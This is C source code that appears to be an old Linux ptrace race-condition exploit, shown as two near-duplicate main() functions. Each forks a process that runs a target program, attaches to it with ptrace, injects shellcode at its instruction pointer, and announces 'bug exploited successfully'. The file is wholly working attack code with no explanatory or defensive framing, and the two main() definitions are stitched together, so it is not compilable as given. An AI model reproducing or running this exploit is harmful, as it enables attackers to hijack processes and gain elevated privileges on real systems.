int
main (int argc, char *argv[])
{
char *filename = VICTIM;
pid_t victim;
int error, i;
struct user_regs_struct regs;
/* take our command args if you wanna play with other progs */
if (argc > 1)
filename = argv[1];
signal (CS_SIGNAL, cs_sig_handler);
victim = fork ();
if (victim < 0)
{
perror ("fork: victim");
exit (-1);
}
if (victim == 0)
do_victim (filename);
kill (victim, CS_SIGNAL);
while (!cs_detector);
if (ptrace (PTRACE_ATTACH, victim))
{
perror ("ptrace: PTRACE_ATTACH");
goto exit;
}
if (check_execve (victim, filename))
goto exit;
(void) waitpid (victim, NULL, WUNTRACED);
if (ptrace (PTRACE_CONT, victim, 0, 0))
{
perror ("ptrace: PTRACE_CONT");
goto exit;
}
(void) waitpid (victim, NULL, WUNTRACED);
if (ptrace (PTRACE_GETREGS, victim, 0, ®s))
{
perror ("ptrace: PTRACE_GETREGS");
goto exit;
}
/* make sure that last null is in there */
for (i = 0; i <= strlen (shellcode); i += 4)
{
if (ptrace (PTRACE_POKETEXT, victim, regs.eip + i,
*(int *) (shellcode + i)))
{
perror ("ptrace: PTRACE_POKETEXT");
goto exit;
}
}
if (ptrace (PTRACE_SETREGS, victim, 0, ®s))
{
perror ("ptrace: PTRACE_SETREGS");
goto exit;
}
fprintf (stderr, "bug exploited successfully.\nenjoy!\n");
if (ptrace (PTRACE_DETACH, victim, 0, 0))
{
perror ("ptrace: PTRACE_DETACH");
goto exit;
}
(void) waitpid (victim, NULL, 0);
return 0;
exit:
fprintf (stderr, "d0h! error!\n");
kill (victim, SIGKILL);
return -1;
}
int main(int argc, char * argv[])
{
char * filename=VICTIM;
pid_t victim;
int error, i;
unsigned long eip=SHELLCODE;
struct user_regs_struct regs;
if (argc>1) filename=argv[1];
if (argc>2) eip=strtoul(argv[2], NULL, 16);
signal(CS_SIGNAL, cs_sig_handler);
victim=fork();
if (victim<0) {
perror("fork: victim");
exit(-1);
}
if (victim==0) do_victim(filename);
kill(victim, CS_SIGNAL);
while (!cs_detector) ;
if (ptrace(PTRACE_ATTACH, victim)) {
perror("ptrace: PTRACE_ATTACH");
goto exit;
}
if (check_execve(victim, filename))
goto exit;
(void)waitpid(victim, NULL, WUNTRACED);
if (ptrace(PTRACE_CONT, victim, 0, 0)) {
perror("ptrace: PTRACE_CONT");
goto exit;
}
(void)waitpid(victim, NULL, WUNTRACED);
if (ptrace(PTRACE_GETREGS, victim, 0, ®s)) {
perror("ptrace: PTRACE_GETREGS");
goto exit;
}
regs.eip=eip;
for (i=0; i<strlen(shellcode); i+=4) {
if (ptrace(PTRACE_POKEDATA, victim, regs.eip+i,
*(int*)(shellcode+i))) {
perror("ptrace: PTRACE_POKETEXT");
goto exit;
}
}
if (ptrace(PTRACE_GETREGS, victim, 0, ®s)) {
perror("ptrace: PTRACE_GETREGS");
goto exit;
}
fprintf(stderr, "Bug exploited successfully.\n");
if (ptrace(PTRACE_DETACH, victim, 0, 0)) {
perror("ptrace: PTRACE_CONT");
goto exit;
}
(void)waitpid(victim, NULL, 0);
return 0;
exit:
fprintf(stderr, "Error!\n");
kill(victim, SIGKILL);
return -1;
}
